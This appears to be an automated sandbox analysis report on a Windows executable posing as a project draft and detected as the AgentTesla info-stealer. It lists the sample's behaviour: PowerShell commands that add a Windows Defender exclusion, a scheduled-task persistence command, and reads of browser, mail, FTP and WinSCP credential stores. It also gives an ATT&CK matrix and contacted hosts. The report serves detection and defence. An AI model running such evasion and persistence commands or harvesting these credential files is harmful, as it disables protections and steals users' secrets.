                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6960, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6508, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6508, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6960, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6508, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection12Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture111System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery311Distributed Component Object ModelInput Capture111Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      CO DRAFT Al Zaytounah project.exe26%VirustotalBrowse
                      CO DRAFT Al Zaytounah project.exe31%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\eyjBzJU.exe31%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://KXS9NVa7QJoby.org0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://CjhhBN.com0%VirustotalBrowse
                      http://CjhhBN.com0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      https://KXS9NVa7QJoby.org$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      server126.web-hosting.com
                      198.54.126.165
                      truefalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://KXS9NVa7QJoby.orgCO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931681747.0000000002E9D000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931642150.0000000002E89000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://api.ipify.org%GETMozilla/5.0CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        low
                        http://CjhhBN.comCO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://DynDns.comDynDNSCO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://server126.web-hosting.comCO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmpfalse
                          high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
